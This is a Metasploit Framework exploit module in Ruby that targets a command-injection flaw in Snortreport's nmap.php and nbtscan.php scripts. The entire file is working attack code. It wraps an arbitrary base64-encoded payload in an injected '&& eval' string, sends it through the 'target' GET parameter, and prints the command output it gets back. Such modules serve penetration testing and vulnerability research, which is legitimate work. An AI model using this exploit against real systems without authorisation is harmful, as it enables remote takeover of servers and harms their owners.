modules/exploits/multi/http/snortreport_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Snortreport nmap.php/nbtscan.php Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in
nmap.php and nbtscan.php scripts.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Paul Rascagneres' #itrust consulting during hack.lu 2011
],
'References' =>
[
['OSVDB', '67739'],
['URL', 'http://www.symmetrixtech.com/articles/news-016.html']
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby telnet python',
}
},
'Platform' => %w{ linux unix },
'Arch' => ARCH_CMD,
'Targets' => [['Automatic',{}]],
'DisclosureDate' => '2011-09-19',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('URI', [true, "The full URI path to nmap.php or nbtscan.php", "/snortreport-1.3.2/nmap.php"]),
])
end
def exploit
base64_payload = Rex::Text.encode_base64(payload.encoded)
start = "127.0.0.1 && echo XXXXX && eval $(echo "
last = " | base64 -d) && echo ZZZZZ"
custom_payload = start << base64_payload << last
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI']),
'vars_get' =>
{
'target' => custom_payload
}
},10)
if (res)
to_print=false
already_print=false
part=res.body.gsub("<BR>","")
part.each_line do |line|
if line =~ /ZZZZZ/
to_print=false
end
if to_print == true
print(line)
end
if line =~ /XXXXX/
already_print=true
to_print=true
end
end
if already_print == false
print_error("This server may not be vulnerable")
end
else
print_error("No response from the server")
end
end
end